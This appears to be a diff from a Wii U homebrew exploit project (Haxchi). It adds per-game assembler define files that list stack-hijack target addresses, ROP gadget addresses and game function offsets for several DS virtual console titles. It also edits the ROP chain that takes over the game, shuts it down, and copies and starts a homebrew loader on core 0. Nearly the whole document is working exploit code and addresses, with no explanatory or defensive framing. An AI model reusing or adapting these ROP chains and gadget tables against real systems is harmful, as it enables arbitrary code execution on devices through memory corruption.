+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02005AB8)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02175AE8)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022740A8)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02017F88)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AB88C)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200EB28)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020809E4)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02054DCC)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018010)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02145D64)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023700)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x0221E0B8)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0221E4D4)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0221DF64)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006944)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F138)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x0221D434)
+_START_EXIT equ (RPX_OFFSET + 0x02025F48)

payload_generator/defines/partnersintime_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B624-0xB8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C91938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16444200)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x022070D8)
+BCTRL equ (RPX_OFFSET + 0x02206F94)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3664)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A323C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791BC)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277B98)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEAA4)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DC0)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205788C)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021492F8)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A3C)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E58)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218E8)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220DA0)
+_START_EXIT equ (RPX_OFFSET + 0x0202693C)

payload_generator/defines/pokemonranger_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B664-0xB8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C91938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16440E00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204A6A0)
+BCTRL equ (RPX_OFFSET + 0x02003D2C)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020AAB64)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020AA73C)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001A8C)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021806C4)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022800B0)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020187E8)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5FA4)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F35C)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x020871A4)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B638)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018870)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x021507F8)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020241EC)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02229E4C)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222A268)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x02229CF8)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006B64)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC44)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222993C)
+_START_EXIT equ (RPX_OFFSET + 0x02026314)

payload_generator/defines/sfcommand_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x10796964-0xB8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C8C938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x1643F200)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02063D3C)
+BCTRL equ (RPX_OFFSET + 0x02004158)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3670)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3248)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x021791C8)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277BA4)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018908)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AEAB0)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4A8)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082E20)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x020578EC)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018990)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02149304)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240EC)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02221A48)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221E64)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x022218F4)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CC8)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB1C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220DAC)
+_START_EXIT equ (RPX_OFFSET + 0x0202699C)

payload_generator/defines/sm64ds_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x107991A4-0xC0)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C8F938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16443300)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02049628)
+BCTRL equ (RPX_OFFSET + 0x0200415C)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A6E10)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A69E8)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0200106C)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217C968)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227B400)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0201899C)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B2250)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F510)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02085334)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x020596A4)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018A24)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214CAA4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02024274)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x02225208)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02225624)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x022250B4)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006D30)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FC7C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x022247D8)
+_START_EXIT equ (RPX_OFFSET + 0x02026908)

payload_generator/defines/yoshids_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079B5E4-0xB8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C91938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16444200)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x02206F7C)
+BCTRL equ (RPX_OFFSET + 0x02206EB4)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A3508)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A3134)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001068)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02179060)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x02277A3C)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018910)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020AE948)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F4B0)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02082DBC)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x02057874)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018998)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214919C)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020240F4)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x022218E0)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02221CFC)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222178C)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006CD0)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FB24)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x02220C44)
+_START_EXIT equ (RPX_OFFSET + 0x02026944)

payload_generator/defines/zeldaph_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x10799D24-0xC0)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C8F938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16443400)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0204AB1C)
+BCTRL equ (RPX_OFFSET + 0x02003CF0)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020A9E30)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020A9A08)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02000BA8)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x0217F988)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x0227E524)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018548)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B5270)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F0BC)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02088050)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205C438)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x020185D0)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x0214FAC4)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02023F14)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222832C)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x02228748)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x022281D8)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x020068C4)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201F97C)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x022278FC)
+_START_EXIT equ (RPX_OFFSET + 0x02025FB0)

payload_generator/defines/zeldast_defs.s

@@ -0,0 +1,39 @@
+
+; game stack return address
+HAX_TARGET_ADDRESS equ (0x1079C564-0xC8)
+; application memory pointer
+HACHI_APPLICATION_PTR equ (0x10C92938)
+; arm9 rom location address
+ARM9_ROM_LOCATION equ (0x16441D00)
+
+; constants for position calcs
+RPX_OFFSET equ (0x01800000)
+ARM7_ROM_MEM2_START equ (0xF0000000 - ARM9_ROM_LOCATION + 0x12000000)
+
+; rop-gadgets part 1 (used for all sorts of different things)
+LMW_R21R1xC_LWZ_R0R1x3C_MTLR_R0_ADDI_R1_x38_BLR equ (RPX_OFFSET + 0x0200369C)
+BCTRL equ (RPX_OFFSET + 0x020041D8)
+MTCTR_R27_ADDI_R31x2_MR_R3R31_R4R30_R5R29_R6R28_BCTRL_LMW_R26R1x18_MTLR_R1x34_ADDI_R1x30_BLR equ (RPX_OFFSET + 0x020ABF18)
+LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR equ (RPX_OFFSET + 0x020ABAF0)
+LWZ_R0R1x14_LWZ_R30R1x8_R31R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02001AF8)
+MR_R11R31_LMW_R26R1x8_LWZ_R0x24_MTLR_R0_ADDI_R1x20_CLRLWI_R3R11x18_BLR equ (RPX_OFFSET + 0x02181A50)
+LWZ_R0R11x4_R31R11xM4_MTLR_R0_MR_R1R11_BLR equ (RPX_OFFSET + 0x022815B4)
+
+; rop-gadgets part 2 (only used to set up core 0 thread stack)
+LWZ_R3_8_R1_LWZ_R0x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x02018A88)
+MR_R12_R3_CMPLW_R12_R0_LI_R3_0_BEQ_ADDI_R3_R12x10_LWZ_R0_R1x14_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x020B7358)
+LWZ_R5_R1x8_CMPLW_R5_R31_BNE_MR_R3_R5_LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x0200F610)
+LWZ_R4_R1xC_STW_R12_R1x8_LWZ_R3_R1x8_LWZ_R0_R1x1C_MTLR_R0_ADDI_R1x18_BLR equ (RPX_OFFSET + 0x02088270)
+LWZ_R7_R1x10_LWZ_R8_R1x14_STW_R7_R31x0_STW_R8_R31x0_LWZ_R0_R1x2C_LWZ_R31_R0x24_MTLR_R0_LWZ_R30_R0x20_ADDI_R1x28_BLR equ (RPX_OFFSET + 0x0205B0C8)
+LWZ_R3_4_R3_LWZ_R0xC_MTLR_R0_ADDI_R1x8_BLR equ (RPX_OFFSET + 0x02018B10)
+LWZ_R0_R1x1C_LWZ_R30_R1x10_MTLR_R0_LWZ_R31_R1x14_ADDI_R1x18_ADD_R3_R7_BLR equ (RPX_OFFSET + 0x02151B84)
+MTCTR_R12_BCTRL_LI_R3_0_LWZ_R0_R1x14_LWZ_R31_R1xC_MTLR_R0_ADDI_R1x10_BLR equ (RPX_OFFSET + 0x0202441C)
+
+; functions used from game
+NERD_CREATETHREAD equ (RPX_OFFSET + 0x0222B28C)
+NERD_STARTTHREAD equ (RPX_OFFSET + 0x0222B6A8)
+NERD_JOINTHREAD equ (RPX_OFFSET + 0x0222B138)
+HACHI_APPLICATION_SHUTDOWNANDDESTROY equ (RPX_OFFSET + 0x02006E2C)
+NERD_FASTWIIU_SHUTDOWN equ (RPX_OFFSET + 0x0201FE74)
+CORE_SHUTDOWN equ (RPX_OFFSET + 0x0222AD7C)
+_START_EXIT equ (RPX_OFFSET + 0x02026544)

payload_generator/haxchi_rop.s

@@ -118,8 +118,10 @@ rop_hook_start:
 .arm.big
 
 rop_start:
-	; quit out of GX2 so we can re-use it in core 0
+	; do hachihachi cleanups so we can use everything safely
+	call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
 	call_func NERD_FASTWIIU_SHUTDOWN, 0, 0, 0, 0
+	call_func CORE_SHUTDOWN, 0, 0, 0, 0
 
 	; set up hbl_loader in core 0
 	call_func_6args NERD_CREATETHREAD, NERD_THREAD0OBJECT, LWZ_R0xAFC_MTLR_R0_ADDI_R1xAF8_BLR, 0x1007E7A8, thread0_param, 0x0, 0x0
@@ -198,13 +200,6 @@ rop_start:
 	call_func NERD_STARTTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
 	call_func NERD_JOINTHREAD, NERD_THREAD0OBJECT, 0x0, 0x0, 0x0
 
-	; clean up the rest of hachihachi
-	call_func HACHI_APPLICATION_SHUTDOWNANDDESTROY, HACHI_APPLICATION_PTR, 0, 0, 0
-	call_func CORE_SHUTDOWN, 0, 0, 0, 0
-
-	; on exit we want to go into mii studio directly
-	call_func _SYSLaunchMiiStudio, 0x0, 0x0, 0x0, 0x0
-
 	; prepare system for foreground release
 	call_func OSSAVESDONE_READYTORELEASE, 0, 0, 0, 0
 
@@ -219,7 +214,7 @@ rop_start:
 	call_func OSRELEASEFOREGROUND, 0, 0, 0, 0
 
 	; launch mii studio app
-	.word _EXIT
+	.word _START_EXIT
 
 	core0rop:
 		; switch codegen to RW
@@ -227,11 +222,11 @@ rop_start:
 
 		; memcpy code
 		call_func MEMCPY, HBL_LOADER_ADR, hbl_loader, hbl_loader_end - hbl_loader, 0x0
